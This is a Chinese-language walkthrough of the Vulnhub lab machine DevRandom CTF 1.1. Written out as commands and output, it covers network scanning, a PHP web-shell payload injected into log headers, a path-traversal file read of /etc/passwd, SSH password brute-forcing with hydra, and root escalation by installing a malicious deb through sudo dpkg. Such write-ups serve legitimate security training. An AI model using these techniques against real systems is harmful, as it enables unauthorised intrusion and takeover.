Vulnhub靶机DevRandom CTF1.1详细测试过程

DevRandom CTF: 1.1

靶机信息

名称:DevRandom CTF: 1.1

地址:

https://www.vulnhub.com/entry/devrandom-ctf-11,450/

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:03      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:9c:b2:21      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.254  08:00:27:ef:c4:95      1      60  PCS Systemtechnik GmbH                                                                                   


利用Kali Linux内置的netdiscover工具识别目标主机IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 04:13 EDT
Nmap scan report for driftingblues.box (192.168.56.254)
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 83e5a151b1f698d319e75910f7f4e85e (RSA)
|   256 b2a679c3ad2fbacc02b3420da2a39e60 (ECDSA)
|_  256 ec1fd4299fa5aeca93f4a86bfd614445 (ED25519)
80/tcp open  http    Apache httpd
| http-robots.txt: 3 disallowed entries 
|_/wp-admin/ /wp-login.php /?include=info
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache
MAC Address: 08:00:27:EF:C4:95 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NMAP扫描结果表明目标主机有2个开放端口:22(ssh),80(http)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/robots.txt                       
User-agent: *
Disallow: /wp-admin/
Disallow: /wp-login.php
Disallow: /?include=info

但是访问/wp-admin/,/wp-login.php,返回的页面内容并非正常wordpress

访问:

http://192.168.56.254/?include=info

访问该地址时,从页面源代码得知CMS是wordpress,但是主机地址却配置有问题,因为该方向的分析没有价值。

ing: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='http://192.168.1.214/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2' media='all' />
<link rel='stylesheet' id='twentytwenty-style-css'  href='http://192.168.1.214/wp-content/themes/twentytwenty/style.css?ver=1.1' media='all' />
──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ nikto -h http://192.168.56.254     
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-05-27 04:17:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Entry '/wp-login.php' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ RFC-1918 /?include=info/: IP address found in the 'link' header. The IP is "192.168.1.214". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /robots.txt: Entry '/?include=info/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/wp-admin/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /secret/: Directory indexing found.
+ /secret/: This might be interesting.

nikto工具发现了/secret目录,访问该目录得到3个文件,其中一个文件大小为0,可不予考虑:

──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/secret/                                                             
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /secret</title>
 </head>
 <body>
<h1>Index of /secret</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="arizona">arizona</a></td><td align="right">2020-03-19 16:52  </td><td align="right"> 42 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="nucleus">nucleus</a></td><td align="right">2020-03-19 16:51  </td><td align="right">  0 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="wrap">wrap</a></td><td align="right">2020-03-22 08:37  </td><td align="right">6.4K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/secret/arizona
API:4395874598yt3r9iy98r7r90t87treterrrrr
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/secret/wrap   


<p> john:Password123


wrap文件中有用户名和密码,但是尝试发现并不能登录ssh

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ ssh john@192.168.56.254                                        
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:AnG5VJ89V2BLxl3FruwQRAYjvRcsk/DSGj3zNJrfMyY.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
john@192.168.56.254's password: 
Permission denied, please try again.

这也许是个陷阱。

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh,.js     
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,txt,html,sh,js
[+] Timeout:                 10s
===============================================================
2023/05/27 04:21:35 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 199]
/.html                (Status: 403) [Size: 199]
/index.php            (Status: 200) [Size: 74]
/wp-content           (Status: 301) [Size: 241] [--> http://192.168.56.254/wp-content/]
/wp-login.php         (Status: 200) [Size: 74]
/license.txt          (Status: 200) [Size: 19935]
/wp-includes          (Status: 301) [Size: 242] [--> http://192.168.56.254/wp-includes/]
/log.php              (Status: 200) [Size: 2324657]
/readme.html          (Status: 200) [Size: 7368]
/robots.txt           (Status: 200) [Size: 86]
/wp-trackback.php     (Status: 200) [Size: 74]
/secret               (Status: 301) [Size: 237] [--> http://192.168.56.254/secret/]
/secret.php           (Status: 200) [Size: 38]

Gobuster工具扫描出文件/log.php

从页面内容可知:view acces.log file : /var/www/html/access.log

该日志文件记录web访问日志,因此可以通过在请求头中插入php代码实现shell的获取

可以用burpsuite拦截请求

在user-agent字段中替换为

<?php system($_GET["cmd"]); ?>

但是此时再访问/log.php,发现返回 的内容仅仅是:view acces.log file : /var/www/html/access.log

还是回到robots.txt中

http://192.168.56.254/?include=info

这里应该存在本地文件包含漏洞,但是注意可能当前文件所在的位置较深,因此需要多层../

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/?include=../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
_apt:x:103:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
john:x:1000:1000:john,,,:/home/john:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lisa:x:1001:1001:,,,:/home/lisa:/bin/bash
henri:x:1002:1002:,,,:/home/henri:/bin/bash
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:107:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:108:65534::/srv/ftp:/usr/sbin/nologin
wordpressftp:x:1003:1003:,,,:/var/www/html:/bin/rbash
victor:x:1004:1004:,,,:/home/victor:/bin/bash
trevor:x:1005:1005:,,,:/home/trevor:/bin/bash

──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ cat user.dict                                                            
trevor
victor
john
lisa
henri

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ hydra -l trevor  -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.254

尝试破解每个用户的密码,得到trevor的密码qwertyuiop[],如果用rockyou.txt会用比较长的时间来破解

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ ssh trevor@192.168.56.254     
trevor@192.168.56.254's password: 
Linux lucifer 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Mar 23 17:54:37 2020
trevor@lucifer:~$ ls -alh
total 28K
drwxr-x--- 4 trevor trevor 4.0K Mar 25  2020 .
drwxr-xr-x 7 root   root   4.0K Mar 23  2020 ..
-rw-r--r-- 1 trevor trevor  220 Mar 23  2020 .bash_logout
-rw-r--r-- 1 trevor trevor 3.5K Mar 23  2020 .bashrc
drwx------ 3 trevor trevor 4.0K Mar 23  2020 .gnupg
drwxr-xr-x 3 trevor trevor 4.0K Mar 23  2020 .local
-rw-r--r-- 1 trevor trevor  807 Mar 23  2020 .profile
trevor@lucifer:~$ sudo -l
Matching Defaults entries for trevor on lucifer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User trevor may run the following commands on lucifer:
    (root) NOPASSWD: /usr/bin/dpkg

提权

安装fpm

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ sudo gem install fpm     

根据GTFOBINS步骤创建deb包

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ TF=$(mktemp -d)
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ echo 'exec /bin/sh' > $TF/x.sh
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

Created package {:path=>"x_1.0_all.deb"}
                                                 

将上述deb上传到目标主机/tmp目录

trevor@lucifer:/tmp$ wget http://192.168.56.253:8000/x_1.0_all.deb
--2023-05-27 04:38:20--  http://192.168.56.253:8000/x_1.0_all.deb
Connecting to 192.168.56.253:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1092 (1.1K) [application/vnd.debian.binary-package]
Saving to: ‘x_1.0_all.deb’

x_1.0_all.deb                           100%[============================================================================>]   1.07K  --.-KB/s    in 0s      

2023-05-27 04:38:20 (37.1 MB/s) - ‘x_1.0_all.deb’ saved [1092/1092]

trevor@lucifer:/tmp$ sudo dpkg -i x_1.0_all.deb 
Selecting previously unselected package x.
(Reading database ... 40777 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
# cd /root
# ls -alh
total 40K
drwx------  4 root root 4.0K May 27 04:30 .
drwxr-xr-x 22 root root 4.0K Mar 19  2020 ..
-rw-------  1 root root  573 Mar 26  2020 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root   89 Mar 22  2020 flag.txt
drwx------  3 root root 4.0K Mar 20  2020 .gnupg
-rw-------  1 root root   36 May 27 04:30 .lesshst
drwxr-xr-x  3 root root 4.0K Mar 19  2020 .local
-rw-------  1 root root  513 Mar 18  2020 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
# cat flag.txt
WELl DONE

echo "THISISTHEFLAGTHISISTHEFLAG\!\!\!\@\@\@###" | base64 > thisistheflag.txt
# 

热门相关:帝少的专属:小甜心,太缠人   夫人,你马甲又掉了!   最强反套路系统   横行霸道   特工重生:快穿全能女神